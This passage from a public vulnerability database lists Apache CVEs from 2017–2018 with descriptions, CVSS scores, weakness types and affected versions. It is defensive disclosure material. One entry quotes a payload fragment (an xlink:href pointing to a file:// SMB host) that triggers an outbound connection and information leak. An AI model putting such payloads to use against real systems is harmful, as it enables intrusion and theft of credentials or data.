In Apache Spark before 2.2.0, it is possible for an attacker to take advantage of a user's trust in the server to trick them into visiting a link that points to a shared Spark cluster and submits data including MHTML to the Spark master, or history server. This data, which could contain a script, would then be reflected back to the user and could be evaluated and executed by MS Windows-based clients. It is not an attack on Spark itself, but on the user, who may then execute the script inadvertently when viewing elements of the Spark web UIs.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache spark *
CVE-2017-7679 HIGH

In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, mod_mime can read one byte past the end of a buffer when sending a malicious Content-Type response header.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-126,CWE-119,

Products Affected

Vendor Product Version
apache http_server *
CVE-2017-7680 MEDIUM

Apache OpenMeetings 1.0.0 has an overly permissive crossdomain.xml file. This allows for flash content to be loaded from untrusted domains.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache openmeetings 3.0.6
apache openmeetings 3.0.2
apache openmeetings 3.1.4
apache openmeetings 3.0.5
apache openmeetings 2.0
apache openmeetings 3.0.7
apache openmeetings 3.0.4
apache openmeetings 3.0.3
apache openmeetings 3.2.0
apache openmeetings 1.0.0
apache openmeetings 3.1.0
apache openmeetings 2.2.0
apache openmeetings 3.0.1
apache openmeetings 3.1.5
apache openmeetings 3.0.0
apache openmeetings 3.1.1
apache openmeetings 2.1
apache openmeetings 3.1.3
apache openmeetings 3.2.1
apache openmeetings 3.1.2
apache openmeetings 2.1.1
CVE-2017-7681 MEDIUM

Apache OpenMeetings 1.0.0 is vulnerable to SQL injection. This allows authenticated users to modify the structure of the existing query and leak the structure of other queries being made by the application in the back-end.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache openmeetings 3.0.6
apache openmeetings 3.0.2
apache openmeetings 3.1.4
apache openmeetings 3.0.5
apache openmeetings 2.0
apache openmeetings 3.0.7
apache openmeetings 3.0.4
apache openmeetings 3.0.3
apache openmeetings 3.2.0
apache openmeetings 1.0.0
apache openmeetings 3.1.0
apache openmeetings 2.2.0
apache openmeetings 3.0.1
apache openmeetings 3.1.5
apache openmeetings 3.0.0
apache openmeetings 3.1.1
apache openmeetings 2.1
apache openmeetings 3.1.3
apache openmeetings 3.2.1
apache openmeetings 3.1.2
apache openmeetings 2.1.1
CVE-2017-7682 MEDIUM

Apache OpenMeetings 3.2.0 is vulnerable to parameter manipulation attacks, as a result attacker has access to restricted areas.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache openmeetings 3.2.0
apache openmeetings 3.2.1
CVE-2017-7683 MEDIUM

Apache OpenMeetings 1.0.0 displays Tomcat version and detailed error stack trace, which is not secure.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache openmeetings 3.0.6
apache openmeetings 3.0.2
apache openmeetings 3.1.4
apache openmeetings 3.0.5
apache openmeetings 2.0
apache openmeetings 3.0.7
apache openmeetings 3.0.4
apache openmeetings 3.0.3
apache openmeetings 3.2.0
apache openmeetings 1.0.0
apache openmeetings 3.1.0
apache openmeetings 2.2.0
apache openmeetings 3.0.1
apache openmeetings 3.1.5
apache openmeetings 3.0.0
apache openmeetings 3.1.1
apache openmeetings 2.1
apache openmeetings 3.1.3
apache openmeetings 3.2.1
apache openmeetings 3.1.2
apache openmeetings 2.1.1
CVE-2017-7684 MEDIUM

Apache OpenMeetings 1.0.0 doesn't check contents of files being uploaded. An attacker can cause a denial of service by uploading multiple large files to the server.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache openmeetings 3.0.6
apache openmeetings 3.0.2
apache openmeetings 3.1.4
apache openmeetings 3.0.5
apache openmeetings 2.0
apache openmeetings 3.0.7
apache openmeetings 3.0.4
apache openmeetings 3.0.3
apache openmeetings 3.2.0
apache openmeetings 1.0.0
apache openmeetings 3.1.0
apache openmeetings 2.2.0
apache openmeetings 3.0.1
apache openmeetings 3.1.5
apache openmeetings 3.0.0
apache openmeetings 3.1.1
apache openmeetings 2.1
apache openmeetings 3.1.3
apache openmeetings 3.2.1
apache openmeetings 3.1.2
apache openmeetings 2.1.1
CVE-2017-7685 MEDIUM

Apache OpenMeetings 1.0.0 responds to the following insecure HTTP methods: PUT, DELETE, HEAD, and PATCH.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache openmeetings 3.0.6
apache openmeetings 3.0.2
apache openmeetings 3.1.4
apache openmeetings 3.0.5
apache openmeetings 2.0
apache openmeetings 3.0.7
apache openmeetings 3.0.4
apache openmeetings 3.0.3
apache openmeetings 3.2.0
apache openmeetings 1.0.0
apache openmeetings 3.1.0
apache openmeetings 2.2.0
apache openmeetings 3.0.1
apache openmeetings 3.1.5
apache openmeetings 3.0.0
apache openmeetings 3.1.1
apache openmeetings 2.1
apache openmeetings 3.1.3
apache openmeetings 3.2.1
apache openmeetings 3.1.2
apache openmeetings 2.1.1
CVE-2017-7686 MEDIUM

Apache Ignite 1.0.0-RC3 to 2.0 uses an update notifier component to update the users about new project releases that include additional functionality, bug fixes and performance improvements. To do that the component communicates to an external PHP server (http://ignite.run) where it needs to send some system properties like Apache Ignite or Java version. Some of the properties might contain user sensitive information.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache ignite 1.9.0
apache ignite 1.8.0
apache ignite 1.6.0
apache ignite 1.7.0
apache ignite 1.3.0
apache ignite 1.5.0
apache ignite 1.1.0
apache ignite 1.4.0
apache ignite 1.2.0
apache ignite 1.0.0
apache ignite 2.0.0
CVE-2017-7687 MEDIUM

When handling a decoding failure for a malformed URL path of an HTTP request, libprocess in Apache Mesos before 1.1.3, 1.2.x before 1.2.2, 1.3.x before 1.3.1, and 1.4.0-dev might crash because the code accidentally calls inappropriate function. A malicious actor can therefore cause a denial of service of Mesos masters rendering the Mesos-controlled cluster inoperable.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache mesos *
apache mesos 1.4.0-dev
apache mesos 1.2.0
apache mesos 1.2.1
apache mesos 1.3.0
apache mesos 1.3.1
CVE-2017-7688 MEDIUM

Apache OpenMeetings 1.0.0 updates user password in insecure manner.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache openmeetings 3.0.6
apache openmeetings 3.0.2
apache openmeetings 3.1.4
apache openmeetings 3.0.5
apache openmeetings 2.0
apache openmeetings 3.0.7
apache openmeetings 3.0.4
apache openmeetings 3.0.3
apache openmeetings 3.2.0
apache openmeetings 1.0.0
apache openmeetings 3.1.0
apache openmeetings 2.2.0
apache openmeetings 3.0.1
apache openmeetings 3.1.5
apache openmeetings 3.0.0
apache openmeetings 3.1.1
apache openmeetings 2.1
apache openmeetings 3.1.3
apache openmeetings 3.2.1
apache openmeetings 3.1.2
apache openmeetings 2.1.1
CVE-2017-9787 MEDIUM

When using a Spring AOP functionality to secure Struts actions it is possible to perform a DoS attack. Solution is to upgrade to Apache Struts version 2.5.12 or 2.3.33.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.17
apache struts 2.3.14.1
apache struts 2.3.11
apache struts 2.3.16.2
apache struts 2.3.10
apache struts 2.3.24.3
apache struts 2.5.1
apache struts 2.5.3
apache struts 2.5.4
apache struts 2.3.28.1
apache struts 2.3.25
apache struts 2.5.10
apache struts 2.3.15.2
apache struts 2.3.16.1
apache struts 2.5.2
apache struts 2.3.32
apache struts 2.5.6
apache struts 2.3.16.3
apache struts 2.3.20.3
apache struts 2.3.27
apache struts 2.3.15.1
apache struts 2.3.23
apache struts 2.3.13
apache struts 2.5.7
apache struts 2.5
apache struts 2.3.26
apache struts 2.5.8
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.29
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.3.31
apache struts 2.5.9
apache struts 2.3.24.2
apache struts 2.5.10.1
apache struts 2.3.30
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.3.22
apache struts 2.3.12
apache struts 2.3.8
apache struts 2.3.19
apache struts 2.3.9
apache struts 2.3.15
apache struts 2.3.28
apache struts 2.5.5
apache struts 2.3.14
apache struts 2.3.24.1
apache struts 2.3.21
apache struts 2.3.20.2
apache struts 2.3.16
CVE-2017-9788 MEDIUM

In Apache httpd before 2.2.34 and 2.4.x before 2.4.27, the value placeholder in [Proxy-]Authorization headers of type 'Digest' was not initialized or reset before or between successive key=value assignments by mod_auth_digest. Providing an initial key with no '=' assignment could reflect the stale value of uninitialized pool memory used by the prior request, leading to leakage of potentially confidential information, and a segfault in other cases resulting in denial of service.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-200,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.2
apache http_server *
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.3
netapp storage_automation_store -
redhat jboss_enterprise_application_platform 6.0.0
redhat enterprise_linux_server_tus 7.6
redhat enterprise_linux_server_eus 7.3
redhat jboss_core_services 1.0
redhat enterprise_linux_server_eus 6.7
redhat enterprise_linux_server 6.0
redhat jboss_enterprise_application_platform 6.4.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_tus 7.4
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
oracle secure_global_desktop 5.3
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_server_eus 7.4
apple mac_os_x *
netapp oncommand_unified_manager -
debian debian_linux 9.0
redhat enterprise_linux_server_eus 7.5
redhat enterprise_linux_desktop 6.0
debian debian_linux 8.0
redhat enterprise_linux_server_eus 7.2
redhat enterprise_linux_server_tus 7.2
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server_eus 7.6
redhat jboss_enterprise_web_server 2.0.0
redhat enterprise_linux_server 7.0
CVE-2017-9789 MEDIUM

When under stress, closing many connections, the HTTP/2 handling code in Apache httpd 2.4.26 would sometimes access memory after it has been freed, resulting in potentially erratic behaviour.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-416,

Products Affected

Vendor Product Version
apache http_server 2.4.26
CVE-2017-9790 MEDIUM

When handling a libprocess message wrapped in an HTTP request, libprocess in Apache Mesos before 1.1.3, 1.2.x before 1.2.2, 1.3.x before 1.3.1, and 1.4.0-dev crashes if the request path is empty, because the parser assumes the request path always starts with '/'. A malicious actor can therefore cause a denial of service of Mesos masters rendering the Mesos-controlled cluster inoperable.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-416,

Products Affected

Vendor Product Version
apache mesos *
apache mesos 1.4.0-dev
apache mesos 1.2.0
apache mesos 1.2.1
apache mesos 1.3.0
apache mesos 1.3.1
CVE-2017-9791 HIGH

The Struts 1 plugin in Apache Struts 2.1.x and 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,CWE-20,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.3.14.1
apache struts 2.3.16.2
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.24.3
apache struts 2.3.1.1
apache struts 2.3.29
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.3.31
apache struts 2.3.28.1
apache struts 2.3.4
apache struts 2.3.30
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.3.15.2
apache struts 2.3.16.1
apache struts 2.3.1
apache struts 2.3.32
apache struts 2.3.12
apache struts 2.3.8
apache struts 2.3.15
apache struts 2.3.28
apache struts 2.3.14
apache struts 2.3.16.3
apache struts 2.3.20.3
apache struts 2.3.1.2
apache struts 2.3.15.1
apache struts 2.3.24.1
apache struts 2.3.16
CVE-2017-9792 MEDIUM

In Apache Impala (incubating) before 2.10.0, a malicious user with "ALTER" permissions on an Impala table can access any other Kudu table data by altering the table properties to make it "external" and then changing the underlying table mapping to point to other Kudu tables. This violates and works around the authorization requirement that creating a Kudu external table via Impala requires an "ALL" privilege at the server scope. This privilege requirement for "CREATE" commands is enforced to precisely avoid this scenario where a malicious user can change the underlying Kudu table mapping. The fix is to enforce the same privilege requirement for "ALTER" commands that would make existing non-external Kudu tables external.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-732,

Products Affected

Vendor Product Version
apache impala 2.8.0
apache impala 2.9.0
CVE-2017-9793 MEDIUM

The REST Plugin in Apache Struts 2.1.x, 2.3.7 through 2.3.33 and 2.5 through 2.5.12 is using an outdated XStream library which is vulnerable and allow perform a DoS attack using malicious request with specially crafted XML payload.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.17
apache struts 2.3.14.1
apache struts 2.3.11
apache struts 2.3.16.2
apache struts 2.3.10
apache struts 2.3.24.3
apache struts 2.5.1
apache struts 2.5.3
apache struts 2.5.4
apache struts 2.3.28.1
apache struts 2.3.25
apache struts 2.3.33
apache struts 2.5.10
apache struts 2.3.15.2
apache struts 2.3.16.1
apache struts 2.5.2
apache struts 2.3.32
apache struts 2.5.6
apache struts 2.3.16.3
apache struts 2.3.27
apache struts 2.5.12
apache struts 2.3.15.1
apache struts 2.3.23
apache struts 2.3.13
apache struts 2.5.7
apache struts 2.5
apache struts 2.3.26
apache struts 2.5.8
apache struts 2.3.20.1
apache struts 2.3.29
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.3.31
apache struts 2.5.9
apache struts 2.3.24.2
apache struts 2.5.10.1
apache struts 2.3.30
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.3.22
apache struts 2.3.12
apache struts 2.3.8
apache struts 2.3.19
apache struts 2.3.9
apache struts 2.3.15
apache struts 2.3.28
apache struts 2.5.5
apache struts 2.3.14
apache struts 2.3.21
apache struts 2.3.20.2
apache struts 2.3.16
CVE-2017-9794 MEDIUM

When a cluster is operating in secure mode, a user with read privileges for specific data regions can use the gfsh command line utility to execute queries. In Apache Geode before 1.2.1, the query results may contain data from another user's concurrently executing gfsh query, potentially revealing data that the user is not authorized to view.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-9795 MEDIUM

When an Apache Geode cluster before v1.3.0 is operating in secure mode, a user with read access to specific regions within a Geode cluster may execute OQL queries that allow read and write access to objects within unauthorized regions. In addition a user could invoke methods that allow remote code execution.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-9796 LOW

When an Apache Geode cluster before v1.3.0 is operating in secure mode, a user with read access to specific regions within a Geode cluster may execute OQL queries containing a region name as a bind parameter that allow read access to objects within unauthorized regions.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-9797 MEDIUM

When an Apache Geode cluster before v1.2.1 is operating in secure mode, an unauthenticated client can enter multi-user authentication mode and send metadata messages. These metadata operations could leak information about application data types. In addition, an attacker could perform a denial of service attack on the cluster.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-9798 MEDIUM

Apache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. This affects the Apache HTTP Server through 2.2.34 and 2.4.x through 2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration. Exploitation with .htaccess can be blocked with a patch to the ap_limit_section function in server/core.c.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-416,

Products Affected

Vendor Product Version
apache http_server 2.4.7
apache http_server *
apache http_server 2.4.25
apache http_server 2.4.0
debian debian_linux 9.0
debian debian_linux 7.0
apache http_server 2.4.23
apache http_server 2.4.2
apache http_server 2.4.6
apache http_server 2.4.20
apache http_server 2.4.12
apache http_server 2.4.18
debian debian_linux 8.0
apache http_server 2.4.4
apache http_server 2.4.3
apache http_server 2.4.16
apache http_server 2.4.26
apache http_server 2.4.10
apache http_server 2.4.1
apache http_server 2.4.17
apache http_server 2.4.9
apache http_server 2.4.27
CVE-2017-9799 MEDIUM

It was found that under some situations and configurations of Apache Storm 1.x before 1.0.4 and 1.1.x before 1.1.1, it is theoretically possible for the owner of a topology to trick the supervisor to launch a worker as a different, non-root, user. In the worst case this could lead to secure credentials of the other user being compromised.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache storm 1.0.2
apache storm 1.1
apache storm 1.0.3
apache storm 1.0
apache storm 1.0.1
CVE-2017-9800 HIGH

A maliciously constructed svn+ssh:// URL would cause Subversion clients before 1.8.19, 1.9.x before 1.9.7, and 1.10.0.x through 1.10.0-alpha3 to run an arbitrary shell command. Such a URL could be generated by a malicious server, by a malicious user committing to a honest server (to attack another user of that server's repositories), or by a proxy server. The vulnerability affects all clients, including those that use file://, http://, and plain (untunneled) svn://.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache subversion 1.10.0
apache subversion 1.9.1
apache subversion 1.9.2
apache subversion 1.9.5
apache subversion 1.9.0
apache subversion 1.9.6
apache subversion *
apache subversion 1.9.3
apache subversion 1.9.4
CVE-2017-9801 MEDIUM

When a call-site passes a subject for an email that contains line-breaks in Apache Commons Email 1.0 through 1.4, the caller can add arbitrary SMTP headers.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache commons_email 1.3.3
apache commons_email 1.2
apache commons_email 1.3.2
apache commons_email 1.0
apache commons_email 1.4
apache commons_email 1.3.1
apache commons_email 1.1
apache commons_email 1.3
CVE-2017-9802 MEDIUM

The Javascript method Sling.evalString() in Apache Sling Servlets Post before 2.3.22 uses the javascript 'eval' function to parse input strings, which allows for XSS attacks by passing specially crafted input strings.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache sling_servlets_post *
CVE-2017-9803 MEDIUM

Apache Solr's Kerberos plugin can be configured to use delegation tokens, which allows an application to reuse the authentication of an end-user or another application. There are two issues with this functionality (when using SecurityAwareZkACLProvider type of ACL provider e.g. SaslZkACLProvider). Firstly, access to the security configuration can be leaked to users other than the solr super user. Secondly, malicious users can exploit this leaked configuration for privilege escalation to further expose/modify private data and/or disrupt operations in the Solr cluster. The vulnerability is fixed from Apache Solr 6.6.1 onwards.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache solr 6.4.0
apache solr 6.2.0
apache solr 6.4.2
apache solr 6.5.1
apache solr 6.2.1
apache solr 6.4.1
apache solr 6.3.0
apache solr 6.5.0
apache solr 6.6.0
CVE-2017-9804 MEDIUM

In Apache Struts 2.3.7 through 2.3.33 and 2.5 through 2.5.12, if an application allows entering a URL in a form field and built-in URLValidator is used, it is possible to prepare a special URL which will be used to overload server process when performing validation of the URL. NOTE: this vulnerability exists because of an incomplete fix for S2-047 / CVE-2017-7672.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.17
apache struts 2.3.14.1
apache struts 2.3.11
apache struts 2.3.16.2
apache struts 2.3.10
apache struts 2.3.24.3
apache struts 2.5.1
apache struts 2.5.3
apache struts 2.5.4
apache struts 2.3.28.1
apache struts 2.3.25
apache struts 2.3.33
apache struts 2.5.10
apache struts 2.3.15.2
apache struts 2.3.16.1
apache struts 2.5.2
apache struts 2.3.32
apache struts 2.5.6
apache struts 2.3.16.3
apache struts 2.3.27
apache struts 2.5.12
apache struts 2.3.15.1
apache struts 2.3.23
apache struts 2.3.13
apache struts 2.5.7
apache struts 2.5
apache struts 2.3.26
apache struts 2.5.8
apache struts 2.3.20.1
apache struts 2.3.29
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.3.31
apache struts 2.5.9
apache struts 2.3.24.2
apache struts 2.5.10.1
apache struts 2.3.30
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.3.22
apache struts 2.3.12
apache struts 2.3.8
apache struts 2.3.19
apache struts 2.3.9
apache struts 2.3.15
apache struts 2.3.28
apache struts 2.5.5
apache struts 2.3.14
apache struts 2.3.21
apache struts 2.3.20.2
apache struts 2.3.16
CVE-2017-9805 MEDIUM

The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,CWE-502,

Products Affected

Vendor Product Version
apache struts *
cisco digital_media_manager -
cisco video_distribution_suite_for_internet_streaming -
netapp oncommand_balance -
cisco hosted_collaboration_solution 11.6(1)
cisco media_experience_engine 3.5
cisco hosted_collaboration_solution 11.5(1)
cisco media_experience_engine 3.5.2
cisco network_performance_analysis -
cisco hosted_collaboration_solution 11.0(1)
cisco hosted_collaboration_solution 10.5(1)
CVE-2017-9806 MEDIUM

A vulnerability in the OpenOffice Writer DOC file parser before 4.1.4, and specifically in the WW8Fonts Constructor, allows attackers to craft malicious documents that cause denial of service (memory corruption and application crash) potentially resulting in arbitrary code execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2018-1000420 MEDIUM

An improper authorization vulnerability exists in Jenkins Mesos Plugin 0.17.1 and earlier in MesosCloud.java that allows attackers with Overall/Read access to obtain credentials IDs for credentials stored in Jenkins.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,

Products Affected

Vendor Product Version
apache mesos *
CVE-2018-1000421 MEDIUM

An improper authorization vulnerability exists in Jenkins Mesos Plugin 0.17.1 and earlier in MesosCloud.java that allows attackers with Overall/Read access to initiate a test connection to an attacker-specified Mesos server with attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,

Products Affected

Vendor Product Version
apache mesos *
CVE-2018-10583 MEDIUM

An information disclosure vulnerability occurs when LibreOffice 6.0.3 and Apache OpenOffice Writer 4.1.5 automatically process and initiate an SMB connection embedded in a malicious file, as demonstrated by xlink:href=file://192.168.0.2/test.jpg within an office:document-content element in a .odt XML document.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache openoffice 4.1.5
canonical ubuntu_linux 16.04
debian debian_linux 9.0
canonical ubuntu_linux 14.04
debian debian_linux 7.0
redhat enterprise_linux_desktop 7.0
libreoffice libreoffice 6.0.3
redhat enterprise_linux_workstation 7.0
debian debian_linux 8.0
redhat enterprise_linux_server 7.0
CVE-2018-11756 HIGH

In PHP Runtime for Apache OpenWhisk, a Docker action inheriting one of the Docker tags openwhisk/action-php-v7.2:1.0.0 or openwhisk/action-php-v7.1:1.0.1 (or earlier) may allow an attacker to replace the user function inside the container if the user code is vulnerable to code exploitation.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache openwhisk *
CVE-2018-11757 HIGH

In Docker Skeleton Runtime for Apache OpenWhisk, a Docker action inheriting the Docker tag openwhisk/dockerskeleton:1.3.0 (or earlier) may allow an attacker to replace the user function inside the container if the user code is vulnerable to code exploitation.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache openwhisk *
CVE-2018-11758 MEDIUM

This affects Apache Cayenne 4.1.M1, 3.2.M1, 4.0.M2 to 4.0.M5, 4.0.B1, 4.0.B2, 4.0.RC1, 3.1, 3.1.1, 3.1.2. CayenneModeler is a desktop GUI tool shipped with Apache Cayenne and intended for editing Cayenne ORM models stored as XML files. If an attacker tricks a user of CayenneModeler into opening a malicious XML file, the attacker will be able to instruct the XML parser built into CayenneModeler to transfer files from a local machine to a remote machine controlled by the attacker. The cause of the issue is XML parser processing XML External Entity (XXE) declarations included in XML. The vulnerability is addressed in Cayenne by disabling XXE processing in all operations that require XML parsing.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache cayenne 3.1.1
apache cayenne 3.1.2
apache cayenne 4.0
apache cayenne *
apache cayenne 3.2
apache cayenne 4.1
CVE-2018-11759 MEDIUM

The Apache Web Server (httpd) specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 did not handle some edge cases correctly. If only a sub-set of the URLs supported by Tomcat were exposed via httpd, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing the application via the reverse proxy. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
redhat jboss_core_services -
apache tomcat_jk_connector *
debian debian_linux 9.0
debian debian_linux 8.0
CVE-2018-11760 LOW

When using PySpark , it's possible for a different local user to connect to the Spark application and impersonate the user running the Spark application. This affects versions 1.x, 2.0.x, 2.1.x, 2.2.0 to 2.2.2, and 2.3.0 to 2.3.1.

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache spark *
CVE-2018-11761 MEDIUM

In Apache Tika 0.1 to 1.18, the XML parsers were not configured to limit entity expansion. They were therefore vulnerable to an entity expansion vulnerability which can lead to a denial of service attack.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
oracle business_process_management_suite 12.2.1.3.0
apache tika *
oracle business_process_management_suite 12.1.3.0.0
CVE-2018-11762 MEDIUM

In Apache Tika 0.9 to 1.18, in a rare edge case where a user does not specify an extract directory on the commandline (--extract-dir=) and the input file has an embedded file with an absolute path, such as "C:/evil.bat", tika-app would overwrite that file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tika *
CVE-2018-11763 MEDIUM

In Apache HTTP Server 2.4.17 to 2.4.34, by sending continuous, large SETTINGS frames a client can occupy a connection, server thread and CPU time without any connection timeout coming to effect. This affects only HTTP/2 connections. A possible mitigation is to not enable the h2 protocol.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 18.04
netapp storage_automation_store -
oracle secure_global_desktop 5.4
oracle instantis_enterprisetrack 17.1
oracle hospitality_guest_access 4.2.1
oracle enterprise_manager_ops_center 12.3.3
redhat enterprise_linux 6.0
redhat enterprise_linux 7.0
redhat enterprise_linux 7.5
redhat enterprise_linux 7.4
oracle retail_xstore_point_of_service 7.1
oracle instantis_enterprisetrack 17.2
oracle hospitality_guest_access 4.2.0
oracle instantis_enterprisetrack 17.3
redhat enterprise_linux 7.6
oracle retail_xstore_point_of_service 7.0
CVE-2018-11764 HIGH

Web endpoint authentication check is broken in Apache Hadoop 3.0.0-alpha4, 3.0.0-beta1, and 3.0.0. Authenticated users may impersonate any user even if no proxy user is configured.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-306,

Products Affected

Vendor Product Version
apache hadoop 3.0.0
CVE-2018-11765 MEDIUM

In Apache Hadoop versions 3.0.0-alpha2 to 3.0.0, 2.9.0 to 2.9.2, 2.8.0 to 2.8.5, any users can access some servlets without authentication when Kerberos authentication is enabled and SPNEGO through HTTP is not enabled.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache hadoop *
apache hadoop 3.0.0
CVE-2018-11766 HIGH

In Apache Hadoop 2.7.4 to 2.7.6, the security fix for CVE-2016-6811 is incomplete. A user who can escalate to yarn user can possibly run arbitrary commands as root user.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache hadoop *
CVE-2018-11767 MEDIUM

In Apache Hadoop 2.9.0 to 2.9.1, 2.8.3 to 2.8.4, 2.7.5 to 2.7.6, KMS blocking users or granting access to users incorrectly, if the system uses non-default groups mapping mechanisms.
